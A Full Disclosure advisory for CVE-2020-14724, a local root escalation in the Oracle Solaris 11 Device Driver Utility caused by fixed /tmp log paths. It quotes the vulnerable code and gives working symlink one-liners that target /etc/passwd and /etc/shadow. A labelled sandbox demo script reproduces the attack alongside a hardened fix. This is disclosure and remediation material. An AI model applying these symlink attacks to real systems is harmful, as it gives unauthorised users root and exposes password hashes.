List: full-disclosure
Subject: [FD] Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root
From: "Larry W. Cashdollar via Fulldisclosure" <fulldisclosure () seclists ! org>
Date: 2020-07-15 4:02:52
Message-ID: 1A0AAEA8-B74F-4CB2-BDFB-22EBF975D7BD () me ! com
Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root
Author: Larry W. Cashdollar, @_larry0
Date: 2020-02-02
CVE-2020-14724
Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html
Vendor: Oracle, fixed in the July 14 2020 Critical Patch Update (CPU): https://www.oracle.com/security-alerts/cpujul2020.html
Vendor Notified: 2020-02-02
Vendor Contact: secalert_us@oracle.com
Advisory: http://www.vapidlabs.com/advisory.php?v=212
Description: "The Device Driver Utility provides information about the devices on your installed system and the drivers that manage those devices. The DDU reports whether the currently booted operating system has drivers for all of the devices that are detected in your system. If a device does not have a driver attached, the Device Driver Utility recommends a driver package to install."
Vulnerability:
Append contents of ddu_log to system files via symlink attack. The log is opened at a fixed, predictable path in /tmp, and logging.basicConfig opens it in append mode by default, so a symlink planted at that name redirects everything the DDU logs into the link target:
In ./ddu-text/utils/ddu-text.py
18: LOG_LOCATION = "/tmp/ddu_log"
45: print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION
50: logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL,
Elevation of privileges via symlink attack due to a chmod operation on a /tmp file:
In file ./ddu-text/utils/inner_window.py
667: logfile = open('/tmp/ddu_err.log', 'a')
695: logfile = open('/tmp/ddu_err.log', 'a')
721: logfile = open('/tmp/ddu_err.log', 'a')
748: logfile = open('/tmp/ddu_err.log', 'a')
In file ./scripts/comp_lookup.sh
33: typeset err_log=/tmp/ddu_err.log
In file ./scripts/det_info.sh
38: typeset err_log=/tmp/ddu_err.log
In file ./scripts/pkg_relate.sh
449: typeset err_log=/tmp/ddu_err.log
In file ./scripts/find_media.sh
20: typeset err_log=/tmp/ddu_err.log
There is a race condition between the creation of /tmp/ddu_err.log and the chmod 666 that follows it: a local user can run a simple loop that re-creates the symlink as soon as ddu_err.log is removed, so that the chmod lands on the symlink target. Note also that the `[ -f ... ]` test follows symlinks, so a symlink to an existing file takes the first branch and is chmod'ed as root via pfexec with no race to win at all:
In file ./scripts/probe.sh
569: # Make /tmp/ddu_err.log writable for every user
571: if [ -f /tmp/ddu_err.log ]; then
572:     pfexec chmod 666 /tmp/ddu_err.log
574:     touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log
636: typeset err_log=/tmp/ddu_err.log
The following fixed /tmp paths are also potential file-clobbering issues. From probe.sh:
131: NIC_info_file=/tmp/dvt_network_info_file
133: temp_file=/tmp/dvt_network_temp
134: temp_file_2=/tmp/dvt_network_temp_2
207: c_file=/tmp/str_ctrl_file
208: c_file1=/tmp/str_ctrl_file_1
209: c_file2=/tmp/str_ctrl_file_2
210: c_file3=/tmp/str_ctrl_file_3
211: c_file4=/tmp/str_ctrl_file_4
212: c_file5=/tmp/str_ctrl_file_5
328: dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile
329: dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile
330: dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1
398: temp_file1=/tmp/dvt_tmp_file1
399: temp_file2=/tmp/dvt_tmp_file2
462: cpu_tmpfile=/tmp/cpu_tmpfile
490: memory_tmpfile=/tmp/memory_tmpfile
624:typeset ctl_file=/tmp/dvt_ctl_file
Exploit Code:
Tested on Solaris 11 x86
larry@SolSun:~$ uname -a
SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc
and Open Indiana
root@openindiana:/export/home/larry# uname -a
SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc
Append content to /etc/passwd:
larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log
To get local root simply have ddu chmod 666 /etc/shadow:
larry@openindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.log; done
A better exploit:
https://github.com/lcashdol/Exploits/tree/master/ddu-exploit
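As an added example (not from the advisory, and not the DDU's own code), the script below reproduces both patterns inside a scratch directory created with mktemp, so nothing outside that directory is touched: the chmod 666 from probe.sh following a pre-planted symlink, the append-mode log landing in the symlink target, and a hardened replacement that creates the log under a private mktemp -d directory with mode 600 and refuses to chmod any name it did not create itself. The sandbox paths, the stand-in "shadow" and "passwd" files and their contents, and the function names are all constructed for the demo and are assumptions, not anything from the DDU code base.

```shell
#!/bin/sh
# Demo of the fixed-name /tmp log pattern versus a private per-run directory.
# Everything lives under a mktemp scratch directory (constructed sandbox).
set -u

SANDBOX=$(mktemp -d) || exit 1
TMP="$SANDBOX/tmp"              # stands in for /tmp
TARGET="$SANDBOX/shadow"        # stands in for /etc/shadow (constructed)
PASSWD="$SANDBOX/passwd"        # stands in for /etc/passwd (constructed)
mkdir -p "$TMP"
printf 'root:*LK*:::::::\n' > "$TARGET"
chmod 400 "$TARGET"
printf 'root:x:0:0::/root:/bin/sh\n' > "$PASSWD"

# Vulnerable pattern, as in probe.sh: a fixed name in a shared directory.
# [ -f ] and chmod both follow symlinks, so a planted link is "the log".
vulnerable_make_log() {
    log="$TMP/ddu_err.log"
    if [ -f "$log" ]; then
        chmod 666 "$log"                 # mode change lands on the link target
    else
        touch "$log"; chmod 666 "$log"   # the race window described above
    fi
}

# Vulnerable append pattern, as with /tmp/ddu_log opened in append mode:
# the write goes wherever the symlink points.
vulnerable_append_log() {
    printf '%s\n' "$1" >> "$TMP/ddu_log"
}

# What the attacker does: plant the symlinks before the tool runs
# (the while-true loop in the advisory just repeats this to win the race).
attacker_plant() {
    ln -sf "$TARGET" "$TMP/ddu_err.log"
    ln -sf "$PASSWD" "$TMP/ddu_log"
}

# Hardened pattern: a fresh private directory (mktemp -d creates it 0700),
# so no other user can pre-create the log name; refuse anything that
# already exists rather than chmod it, and create the log with umask 077.
safe_make_log() {
    dir=$(mktemp -d "$TMP/ddu.XXXXXX") || return 1
    log="$dir/ddu_err.log"
    if [ -L "$log" ] || [ -e "$log" ]; then
        return 1
    fi
    (umask 077; : > "$log") || return 1
    printf '%s\n' "$log"
}

# Permission bits of a file as octal, e.g. 400 (GNU stat, BSD stat fallback).
mode_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

last_line_of() {
    tail -n 1 "$1"
}

cleanup() {
    rm -rf "$SANDBOX"
}
```

Run it as an ordinary user: the chmod through the symlink succeeds because the sandbox files are owned by the caller, which is exactly what pfexec supplies for /etc/shadow in the real case. The hardened function only removes the symlink hazard because the directory it creates is private; checking `-L` first and then chmod'ing in the shared /tmp would still leave a time-of-check/time-of-use window.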
Patches to OpenIndiana
https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/